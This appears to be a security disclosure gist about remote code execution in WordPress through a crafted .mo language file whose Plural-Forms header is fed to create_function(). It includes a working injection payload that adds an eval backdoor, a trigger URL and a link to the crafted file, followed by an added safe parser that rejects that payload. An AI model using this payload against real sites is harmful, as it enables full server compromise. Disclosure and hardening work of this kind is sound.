Created October 8, 2016 13:05
WordPress RCE via specially crafted .mo language file

The vulnerable code in wp-includes/pomo/translations.php:

    // Builds a PHP function from the Plural-Forms header of a .po/.mo file.
    // $expression comes straight from the language file and is spliced into
    // PHP source text without any validation or escaping.
    function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        // create_function() compiles $func_body as PHP code at runtime.
        return create_function('$n', $func_body);
    }

PHP's create_function() internally performs zend_eval_stringl(), so an attacker can use } to close the anonymous function body early and have arbitrary code executed while the anonymous function is being created :-)
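The root cause is that untrusted text from the .mo header becomes PHP source. As an added example (not part of the original gist and not WordPress's own code), the hypothetical helper below shows the defensive alternative: tokenize the Plural-Forms expression against a strict whitelist and evaluate it with a small interpreter, so no byte of the language file is ever compiled. The class and function names, the sample Russian expression and the demo inputs are all assumptions constructed for this example.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical safe replacement for make_plural_form_function() (example code,
 * not WordPress's). Grammar, C precedence, right-associative ?: :
 *   ternary := or ('?' ternary ':' ternary)?
 *   or      := and ('||' and)*         and := eq ('&&' eq)*
 *   eq      := rel (('=='|'!=') rel)*  rel := mod (('<'|'>'|'<='|'>=') mod)*
 *   mod     := primary ('%' primary)*  primary := 'n' | INTEGER | '(' ternary ')'
 */
final class PluralExpr
{
    private $toks = [];
    private $pos = 0;

    public function __construct(string $expr)
    {
        $s   = (string) preg_replace('/\s+/', '', $expr);
        $len = strlen($s);
        for ($i = 0; $i < $len; ) {
            // Only these lexemes are legal; ';', '}', '$', letters etc. fail here.
            if (!preg_match('/\G(n|\d+|==|!=|<=|>=|&&|\|\||[<>%?:()])/', $s, $m, 0, $i)) {
                throw new InvalidArgumentException(
                    "illegal token at offset $i: " . substr($s, $i, 12));
            }
            $this->toks[] = $m[1];
            $i += strlen($m[1]);
        }
        $this->evaluate(1); // parse once now so malformed input fails before use
    }

    public function evaluate(int $n): int
    {
        $this->pos = 0;
        $v = $this->ternary($n);
        if ($this->pos !== count($this->toks)) {
            throw new InvalidArgumentException('trailing tokens in plural expression');
        }
        return $v;
    }

    private function peek(): ?string { return $this->toks[$this->pos] ?? null; }

    private function expect(string $t): void
    {
        if ($this->peek() !== $t) {
            throw new InvalidArgumentException("expected '$t' in plural expression");
        }
        $this->pos++;
    }

    private function ternary(int $n): int
    {
        $c = $this->orExpr($n);
        if ($this->peek() !== '?') { return $c; }
        $this->pos++;
        $a = $this->ternary($n);
        $this->expect(':');
        $b = $this->ternary($n);
        return $c !== 0 ? $a : $b;
    }

    // Both operands are always evaluated (no short-circuit) so every token is consumed.
    private function orExpr(int $n): int
    {
        $v = $this->andExpr($n);
        while ($this->peek() === '||') { $this->pos++; $r = $this->andExpr($n); $v = ($v !== 0 || $r !== 0) ? 1 : 0; }
        return $v;
    }

    private function andExpr(int $n): int
    {
        $v = $this->eq($n);
        while ($this->peek() === '&&') { $this->pos++; $r = $this->eq($n); $v = ($v !== 0 && $r !== 0) ? 1 : 0; }
        return $v;
    }

    private function eq(int $n): int
    {
        $v = $this->rel($n);
        while (in_array($this->peek(), ['==', '!='], true)) {
            $op = $this->toks[$this->pos++];
            $r  = $this->rel($n);
            $v  = ($op === '==' ? $v === $r : $v !== $r) ? 1 : 0;
        }
        return $v;
    }

    private function rel(int $n): int
    {
        $v = $this->mod($n);
        while (in_array($this->peek(), ['<', '>', '<=', '>='], true)) {
            $op = $this->toks[$this->pos++];
            $r  = $this->mod($n);
            if ($op === '<') { $b = $v < $r; } elseif ($op === '>') { $b = $v > $r; }
            elseif ($op === '<=') { $b = $v <= $r; } else { $b = $v >= $r; }
            $v = $b ? 1 : 0;
        }
        return $v;
    }

    private function mod(int $n): int
    {
        $v = $this->primary($n);
        while ($this->peek() === '%') {
            $this->pos++;
            $r = $this->primary($n);
            if ($r === 0) { throw new InvalidArgumentException('modulo by zero in plural expression'); }
            $v %= $r;
        }
        return $v;
    }

    private function primary(int $n): int
    {
        $t = $this->peek();
        if ($t === 'n') { $this->pos++; return $n; }
        if ($t !== null && ctype_digit($t)) { $this->pos++; return (int) $t; }
        if ($t === '(') { $this->pos++; $v = $this->ternary($n); $this->expect(')'); return $v; }
        throw new InvalidArgumentException('unexpected ' . ($t ?? 'end of input') . ' in plural expression');
    }
}

/** Same shape as the vulnerable helper, but no PHP source is generated. */
function make_plural_form_function_safe(int $nplurals, string $expression): Closure
{
    $expr = new PluralExpr($expression); // throws on anything outside the grammar
    return static function (int $n) use ($expr, $nplurals): int {
        $index = $expr->evaluate($n);
        return $index < $nplurals ? $index : $nplurals - 1;
    };
}

// Demo on constructed inputs: a real-world Russian rule, then the PoC header.
$ru = make_plural_form_function_safe(3,
    'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2');
foreach ([1, 2, 5, 11, 21, 22, 25, 111] as $n) {
    printf("ru n=%d -> form %d\n", $n, $ru($n));
}
try {
    // The tokenizer stops at ';', so the '}' never reaches a PHP compiler.
    make_plural_form_function_safe(1, 'n);}eval($_GET[c]);/*;');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The expression grammar is closed: `n`, integers, parentheses, `%`, comparisons, `&&`, `||` and `?:` are the only tokens, so there is nothing an attacker can append that the interpreter would treat as code. Note also that create_function() itself was deprecated in PHP 7.2 and removed in PHP 8.0, so any remaining caller has to be replaced regardless of whether its input is trusted.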

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide a crafted .mo language file; set the default language to Chinese, then access the following URL and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM
